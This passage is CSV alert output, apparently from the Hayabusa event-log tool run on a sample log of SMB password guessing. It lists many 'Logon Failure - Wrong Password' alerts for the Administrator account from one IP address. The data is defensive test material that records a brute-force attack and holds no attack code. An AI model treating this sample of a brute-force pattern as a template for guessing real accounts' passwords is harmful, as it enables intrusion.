NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: 